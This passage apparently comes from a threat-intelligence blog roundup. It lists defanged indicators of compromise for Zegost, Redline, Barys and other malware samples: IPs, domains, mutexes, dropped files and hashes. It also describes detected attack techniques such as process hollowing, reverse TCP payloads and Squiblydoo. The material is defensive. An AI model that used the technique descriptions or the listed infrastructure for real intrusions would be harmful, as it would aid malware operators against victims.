<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: Publisher
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\RESUME
Value Name: DisplayVersion
10
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Finalize
1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
63[.]251[.]106[.]25 10
199[.]59[.]242[.]153 9
103[.]224[.]212[.]221 9
91[.]195[.]240[.]46 1
173[.]194[.]207[.]102 1
172[.]217[.]197[.]138 1
172[.]217[.]197[.]101 1
173[.]194[.]175[.]94 1
173[.]194[.]207[.]94 1
70[.]32[.]1[.]32 1
172[.]217[.]197[.]132 1
209[.]85[.]201[.]94 1
209[.]85[.]201[.]113 1
192[.]99[.]8[.]34 1
209[.]85[.]144[.]104 1
173[.]194[.]207[.]84 1
170[.]178[.]168[.]203 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
data[.]biphysics[.]com 10
www[.]download-servers[.]com 10
77026[.]bodis[.]com 9
ww25[.]download-servers[.]com 9
ww16[.]download-servers[.]com 1
sstatic1[.]histats[.]com 1
Files and or directories created Occurrences
%APPDATA%\InstallW 10
%APPDATA%\InstallW\Full_Setup.exe 10
%APPDATA%\InstallW\Resume.exe 10
%APPDATA%\InstallW\Uninstall.exe 10
%TEMP%\ns<random, matching '[a-z][A-F0-9]{1,4}'>.tmp 10
%TEMP%\nswCA1A.tmp\System.dll 1
%TEMP%\nswCA1A.tmp\WmiInspector.dll 1
%TEMP%\nswCA1A.tmp\inetc.dll 1
%TEMP%\nswCA1A.tmp\t1.dll 1
%TEMP%\nsv1001.tmp\IpConfig.dll 1
%TEMP%\nsv1001.tmp\WmiInspector.dll 1
%TEMP%\nsv1001.tmp\inetc.dll 1
%TEMP%\nsv1001.tmp\t1.dll 1
%TEMP%\nsv19C1.tmp\IpConfig.dll 1
%TEMP%\nsv19C1.tmp\WmiInspector.dll 1
%TEMP%\nsv19C1.tmp\inetc.dll 1
%TEMP%\nsv19C1.tmp\t1.dll 1
%TEMP%\nsv379D.tmp\IpConfig.dll 1
%TEMP%\nsv379D.tmp\WmiInspector.dll 1
%TEMP%\nsv379D.tmp\inetc.dll 1
%TEMP%\nsv379D.tmp\t1.dll 1
%TEMP%\nsp3387.tmp\IpConfig.dll 1
%TEMP%\nsp3387.tmp\WmiInspector.dll 1
%TEMP%\nsp3387.tmp\inetc.dll 1
%TEMP%\nsp3387.tmp\t1.dll 1
*See JSON for more IOCs

File Hashes

04a96ad3d5fca39804f7c262e1487e15d355fffdfddd99dc6e1d9e9519fcbbf3 1a79383e772054f9c1e373be26c02d2248e032e440b8e6ad59207eb4aaf647ac 347db26bebcd8597ce73dd9e6e70800b92b46036b1660e3338b09e29e8d65ef6 578ccd93a40a3fe4571925cbb984d0fc98bfd54fbe274c602927790a832dd017 9db85ec2ffbf32b27c7d95cb01d9b504a4ddb60b832ba1769d19f531ab00b91f a426ea49405a00465b8b9f41a8c6837b2be019c876b43de6c6cb2ecbf107acea aa04c4ffe2df9dde68aad4e39a9bc91e2c7ce809289e50cee354b60ab431fa61 c217cbbf1c7f1538152787ecd89b076cbab08134794ff92d5c115a035dbe87ad d9d4d82840fbdbd85430e0c67a60daf4fcf4585c4d5377395d3e78f1a5a874fe e482da2a197f033bb7802fbb3de9c89d0911f020553701814f0d9e49170acf86

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Trojan.Zegost-9869702-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Mutexes Occurrences
216.99.150.253127.0.0.1127.0.0.1 2
192.168.1.102127.0.0.1127.0.0.1 1
123.53.111.15127.0.0.1127.0.0.1 1
zjzfzq.no-ip.orgzjzfzq.vicp.netzjzfzq.no-ip.org 1
Global\c8fc2141-c891-11eb-b5f8-00501e3ae7b6 1
zjzfzq.vicp.netwww.zjzfzq.comwww.zjzfzq.com 1
zhanghaor.xicp.net127.0.0.1127.0.0.1 1
Global\cef6b561-c891-11eb-b5f8-00501e3ae7b6 1
aaa.hk5586.cn127.0.0.1127.0.0.1 1
14.17.74.16214.17.74.16214.17.74.162 1
zjzfzq.vicp.netzjzfzq.vicp.netzjzfzq.f3322.net 1
183.18.143.152127.0.0.1127.0.0.1 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
45[.]119[.]125[.]223 3
112[.]90[.]135[.]151 2
216[.]99[.]150[.]253 2
123[.]53[.]111[.]15 1
14[.]17[.]74[.]162 1
183[.]18[.]143[.]152 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ip[.]aa2[.]cn 3
ip[.]chinaz[.]com 2
ip[.]chinaz[.]com[.]wswebpic[.]com 2
Files and or directories created Occurrences
\$WinBackUP.H1409 11
\$WinBackUP.H1409\1 11
\$WinBackUP.H1409\1\tursafeoua.url 5
\$WinBackUP.H1409\uay.lnk 4
\$WinBackUP.H1409\wmg.inf 4
\$WinBackUP.H1409\dodnd.lnk 4
\$WinBackUP.H1409\dxdhh.url 4
\$WinBackUP.H1409\svchks.exe 4
\$WinBackUP.H1409\svchwo.exe 3
\$WinBackUP.H1409\sce.lnk 3
\$WinBackUP.H1409\uem.inf 3
\$WinBackUP.H1409\jhu.txt 3
\$WinBackUP.H1409\qddko.url 3
\$WinBackUP.H1409\kdddf.lnk 3
\$WinBackUP.H1409\sddus.url 3
\$WinBackUP.H1409\svchyc.exe 3
\$WinBackUP.H1409\wco.txt 3
\$WinBackUP.H1409\gddmu.url 3
\$WinBackUP.H1409\svchce.exe 3
\$WinBackUP.H1409\jrg.txt 3
\$WinBackUP.H1409\addtf.lnk 3
\$WinBackUP.H1409\1\tursafekao.url 3
\$WinBackUP.H1409\1\tursafeyuo.url 2
\$WinBackUP.H1409\dfdnl.url 2
\$WinBackUP.H1409\dsdbv.lnk 2
*See JSON for more IOCs

File Hashes

1fb2c14783c3332fc804552c190781cf2b8806beee0ab9d5a14e05a753177797 35faf271edd8a578ca2a312512169ecd821bd1fc7baf74ac98484d44b2ef4329 4775b92ac69eb1cbae41d4cac018b7340d7f3c0247e146314961c39024ea40a3 784b7bc18dc2b6ee8ef5b434f47550c80821c0f1c9a37d0b85199054089a8032 8a0ff9e83ed8913850849869c773d128f3aa60f4565e6d6369a65665a1d9e2f8 b5367c62475cb825573d0f94d6ce154bba0a8aa0b2c18bd4baf1a9e9d5937b4c c11679468a851cb4f921ba3fa258074458ba2a5bdafa49534273133d8075e05b ccce1aeea85a2be31fcc274b621aa0621a00f6452bc2b5c13f8770a51a826896 e83eb23d275c355366d99907e0aa06b9c43f795b4b6a0cf528f8bb7beb9dedf4 eb49827787b87782c6ca9007b88de6a9296bcb9919b95ccb10e502527e09f8b3 ff7e27a20a4b275542856a6fbfa8a4ea040adbbe908f75f8451613ea8eba5ee2

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Redline-9869818-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Mutexes Occurrences
serhershesrhsfesrf 7
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
176[.]121[.]14[.]43 11
188[.]120[.]251[.]192 6
104[.]26[.]13[.]31 4
172[.]67[.]75[.]172 3
104[.]26[.]12[.]31 2
54[.]235[.]175[.]90 2
45[.]130[.]147[.]55 2
23[.]23[.]104[.]250 2
172[.]217[.]197[.]113 1
172[.]217[.]197[.]100 1
209[.]85[.]144[.]94 1
54[.]235[.]83[.]248 1
209[.]85[.]201[.]138 1
173[.]194[.]208[.]94 1
173[.]194[.]208[.]100 1
173[.]194[.]204[.]132 1
209[.]85[.]144[.]99 1
173[.]194[.]207[.]84 1
50[.]19[.]96[.]218 1
62[.]113[.]117[.]9 1
173[.]194[.]175[.]94/31 1
50[.]16[.]218[.]217 1
54[.]235[.]194[.]223 1
23[.]21[.]224[.]49 1
23[.]21[.]205[.]229 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
api[.]ip[.]sb 12
spaceufx[.]site 11
api[.]ipify[.]org 7
api[.]ip[.]sb[.]cdn[.]cloudflare[.]net 7
elb097307-934924932[.]us-east-1[.]elb[.]amazonaws[.]com 6
coronttegal[.]xyz 2
bukkva[.]site 1
Files and or directories created Occurrences
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp 12
%ProgramData%\kaosdma.txt 7
%TEMP%\1622445233532.exe 1
%TEMP%\1622445233642.exe 1

File Hashes

23b5c3918d3f72384e99077de4cb6899e6c19778101596ad5f9e6f0c571d10d2 3760f92767c4d166d590641ebd7342088af334d55a5bcc1d24739ea3c3807815 3d92bcd62542fb34076843712e0336154e723a3e9e4f74eb8fe5547c57fb1d23 4d3683f901e98680bf4e55e142d8732816e108ddd0468af546c18127389dfafb 5c96a0d90b81e320f0a6a38fb7e1d8e38b90f833f8209bfb82ef82cc1143f39b 6df3df16f6bb2d1076190733567b7bc99dbe1666df8e1d1f7fe96ec70d5076ea a08541a84b3043273d2b4c1d03bacf5037bf9372e0c7ccd6858f26b33d45691c ace414286dd535ac8320c6432f6c4a46771869820bba42b742a51648903e1d39 b2442cd921b677b1124d520808da01874f76df8421fa4ba64bf6170a8d61b703 c9c0e56a2596947f6fa2d60430ea07814cce26d99b6b5ffe83d2f10b63beab77 ca6ae5395d89cb59b20e43a590e1f607137261e5d0c57cd3a4836bb2b4a0ed13 cb29c556d7ea2f27fe056ae5875860953b96f01d13e4f6e4149678b10df31025 d0281c02a2a01b4e6c835a6142c7d78ae21ddf3709aaf4d860c3d964ad142ecb d8b2be21e596a64382426fd514515fcb6fcd650f5ec0478956d7bd37aaeb17ff e90a78e7b3488669ecffc877fb226f41720d1173f6b7b2586c3ce393bbb36ae5 ef32bddbe585cfaa55f6647b6e756007d858d4e085acc9a24c7157d5b6edef48 efb0dccddab4628bc5d7cdac801055a0c2261c76a87576ce6dd4bf5e26798725 f89fed283d387461ef2dbe4fb3871504ca0b51dc31bb58d3f18620cf01df6c99 f9889866e67061eb2178eb0020ab2d29813506943667c36685dc7c64a3bb1c19 fa9eabfe20dd2685a2c200a8bfe56fa9641fb6853e458be945d700e9e21ce420 fb34ea7c58ccf95bf8b840d0ff4e8a049978a954358b7a8ad05bb14b9770f02e

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Downloader.Barys-9868878-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
200[.]147[.]100[.]53 8
200[.]147[.]35[.]224 7
200[.]147[.]3[.]199 5
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
e[.]indice[.]uol[.]com[.]br 10
amazonas[.]uol[.]com[.]br 8
ionaldohistoria[.]sites[.]uol[.]com[.]br 3
girovisao[.]sites[.]uol[.]com[.]br 2
fernandomartins[.]sites[.]uol[.]com[.]br 1
moreiraiorio[.]sites[.]uol[.]com[.]br 1
raimundont[.]sites[.]uol[.]com[.]br 1
itamarati[.]ass[.]sites[.]uol[.]com[.]br 1
empenhas[.]sites[.]uol[.]com[.]br 1
egidiobr[.]sites[.]uol[.]com[.]br 1
Files and or directories created Occurrences
\windy 10
\windy\Funcoes.dll 10
\windy\Avast.exe 8
\windy\Panda.exe 8
\windy\scmd.exe 8
\windy\Lsas.exe 2
\windy\bTray.exe 2
\windy\conhost.exe 2

File Hashes

09eaa35c686f66b8be31ef6b841a37b059be8607b60eb4bb6119baf11c325a24 2b1b1e736abedeb4f101950bfed93ab637ab78a9f1a05ae58317604d6f6b2ee4 443e78d8b2c3cc647ac4818f2a7ef4d6621e02e09c2ada9dbf731269d8efc63c 4bcf9feba6524071761e26b4a5f9e42e75240597067368b8f084de50cf924dca 53cee24ff4c7697949619305deaaccf57ebee3b62d7bac8879b2cd3d8cea9d13 85e56618d4ac106ebdbbcd2d601074421d6e4685e8c138d6e51b87d8188586a3 9cdd6aed2eac968ca07515b020b80a418c56a3e850c58b831edc55179fc6f0be b860adc37914cec34f532d3014a8cfb1ceec15de453df7cbd30c221fb5bede8b f1abb7176ee77a668a1f8e0b2bab7f51af25b692443388e758dd9cbb3b66d953 f5101f6117c5b75fae2f68769c5bebdef6dd136490a90aea66f20767418c69f3

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (14532)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (6733)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Trickbot malware detected - (6425)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Reverse tcp payload detected - (3031)
An exploit payload intended to connect back to an attacker controlled host using tcp has been detected.
Crystalbit-Apple DLL double hijack detected - (1625)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
A Microsoft Office process has started a windows utility. - (715)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Kovter injection detected - (509)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application control bypass attempt detected. - (354)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
Dealply adware detected - (129)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Gamarue malware detected - (97)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.